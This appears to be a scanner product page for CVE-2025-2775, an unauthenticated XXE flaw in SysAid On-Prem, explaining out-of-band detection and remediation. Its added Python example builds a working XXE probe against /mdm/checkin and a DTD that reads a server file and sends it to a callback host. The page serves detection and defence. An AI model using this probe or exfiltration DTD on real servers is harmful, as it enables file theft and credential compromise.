CVE-2025-2775 Scanner

CVE-2025-2775 Scanner - XML External Entity (XXE) vulnerability in SysAid On-Prem

Short Info

Level: Critical
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 8 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

SysAid On-Prem is an IT service management (ITSM) platform used by enterprises to manage IT operations, support tickets, and assets. It is commonly deployed by mid-sized to large organizations in education, healthcare, finance, and government. System administrators and helpdesk teams use it to streamline support tasks and keep visibility over IT infrastructure. The platform offers ticketing, a CMDB, remote control, and mobile device management (MDM), which makes it a central tool in IT workflows and, because it holds asset and credential data, a high-value target. The on-premises edition gives organizations with strict data security policies more control over where that data lives, but it also leaves them responsible for patching the server themselves. SysAid's flexibility and integrations have made it a popular choice for managing IT services.

This scanner detects an unauthenticated XML External Entity (XXE) vulnerability, CVE-2025-2775, in SysAid On-Prem. The flaw is in the /mdm/checkin endpoint, which parses client-supplied XML with external entity resolution enabled, so a DOCTYPE supplied by the requester is honored and the server resolves entities that point at local files or remote URLs. The direct impact is arbitrary file read from the SysAid server, together with server-side requests to any host the server can reach. Remote code execution is not a property of the XXE by itself; it becomes reachable when the file read is chained with other weaknesses in the product. Because the endpoint is reachable without credentials, anyone who can reach the server over HTTP can exploit it. The vulnerability is rated critical because of this impact and the low complexity of exploitation.

The scanner sends a POST request with a crafted XML body to the /mdm/checkin endpoint. The body carries a DOCTYPE declaration that defines a parameter entity whose SYSTEM identifier is a DTD URL on an interaction server the scanner controls, and references that entity in the internal subset. A vulnerable server fetches the DTD while parsing, so the scanner detects the flaw out of band (OAST): it checks the interaction server for an HTTP request containing the unique token embedded in the URL. Two properties of that callback distinguish a real XXE from an unrelated hit: it arrives over HTTP (a DNS-only lookup would not), and its User-Agent header begins with "Java", the default User-Agent of the JVM HTTP client that the SysAid server's XML parser uses to fetch the external DTD. This blind, callback-based check confirms that external entity resolution is enabled without reading any file from the target. It has one limitation: a server whose outbound HTTP is blocked by egress filtering never reaches the interaction server and is reported as not vulnerable even though it is, so a negative result on an egress-restricted host should be confirmed by checking the installed version.
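The probe and the callback check described above, as an added example that is not part of this page or of the scanner's own code. The host names, the token, the `<checkin>` root element, the request headers and the interaction-server log records are all assumptions; nothing here touches the network. It also shows the defender-side counterpart, a parser that refuses any DOCTYPE before an entity can be declared, and, for the file-read impact mentioned on this page, the generic out-of-band DTD an attacker-controlled server would return.

```python
"""Blind (out-of-band) XXE probe for an XML endpoint such as /mdm/checkin,
plus the interaction-server check that confirms it.  Example code added to
this page, not the scanner's implementation.  Host names, token, root
element, headers and callback records are assumptions / constructed data."""
import xml.parsers.expat

ENDPOINT = "/mdm/checkin"


def build_xxe_probe(callback_host: str, token: str) -> str:
    """XML body whose DOCTYPE makes a vulnerable parser fetch an external DTD.
    %xxe; is a parameter entity, expanded while the DTD is processed and
    before any element content is read, so the fetch happens even if the
    application never looks at the document body."""
    dtd_url = f"http://{callback_host}/{token}.dtd"
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE checkin [\n"
        f'  <!ENTITY % xxe SYSTEM "{dtd_url}">\n'
        "  %xxe;\n"
        "]>\n"
        "<checkin><udid>probe</udid></checkin>\n"  # root element assumed
    )


def build_request(target_host: str, body: str) -> bytes:
    """Raw HTTP/1.1 request the scanner would send (headers assumed)."""
    payload = body.encode()
    head = (
        f"POST {ENDPOINT} HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        "Content-Type: application/xml\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode() + payload


def build_exfil_dtd(callback_host: str, token: str, path: str) -> str:
    """Generic OOB-XXE DTD an attacker-hosted server would return to turn
    the callback into a file read: the file is loaded into %file and sent
    back in the query string of a second request.  Only works for short
    files without newlines or URL-breaking characters."""
    return (
        f'<!ENTITY % file SYSTEM "file://{path}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM '
        f"'http://{callback_host}/{token}?d=%file;'>\">\n"
        "%eval;\n"
        "%send;\n"
    )


def confirms_xxe(callbacks, token: str):
    """Scanner-side check: the interaction record proving the target fetched
    our DTD, or None.  Requires an HTTP hit carrying the token and the JVM
    default User-Agent ("Java/..."), as the page describes."""
    for cb in callbacks:
        if cb.get("protocol") != "http" or token not in cb.get("path", ""):
            continue
        if not cb.get("user_agent", "").startswith("Java"):
            continue
        return cb
    return None


def parse_without_dtd(xml_text: str) -> str:
    """Defender side: reject any document carrying a DOCTYPE before a single
    entity can be declared; otherwise return the root element name."""
    parser = xml.parsers.expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError(f"DOCTYPE rejected: {name}")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(xml_text, True)
    return root[0]


def rejects_doctype(xml_text: str) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_without_dtd(xml_text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed interaction-server log: a DNS lookup, a manual curl fetch,
    # and the JVM fetch that a vulnerable SysAid server would produce.
    CALLBACKS = [
        {"protocol": "dns", "path": "", "user_agent": ""},
        {"protocol": "http", "path": "/abc123.dtd", "user_agent": "curl/8.5.0"},
        {"protocol": "http", "path": "/abc123.dtd", "user_agent": "Java/17.0.9"},
    ]
    probe = build_xxe_probe("oast.example.net", "abc123")
    print(build_request("sysaid.example.com", probe).decode())
    print("vulnerable:", confirms_xxe(CALLBACKS, "abc123") is not None)
    print("hardened parser rejects probe:", rejects_doctype(probe))
```

The probe only proves that the parser resolves external parameter entities; the `build_exfil_dtd` document is what the attacker's server would have to answer with to read a file, and it fails on anything the URL cannot carry, which is why real file-read chains usually use FTP or an error-based DTD instead. The hardened parser rejects the DOCTYPE outright, which is the mitigation every XML endpoint that accepts untrusted input should apply.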

If exploited, the vulnerability lets an attacker read files on the server hosting SysAid On-Prem, including configuration files that hold database and service credentials, and exfiltrate them through the same out-of-band channel the detection uses. With credentials or session material from those files, an attacker can obtain administrative access to the ITSM environment and from there modify or delete ticket records, remove logs, or pivot to other internal systems that SysAid integrates with. The consequences include data loss, service disruption, and regulatory non-compliance. Remediation is to upgrade to the SysAid On-Prem release that fixes this issue (24.4.60 or later); until that is done, restrict unauthenticated access to /mdm/checkin at the network edge and block outbound HTTP from the server to limit blind exfiltration.
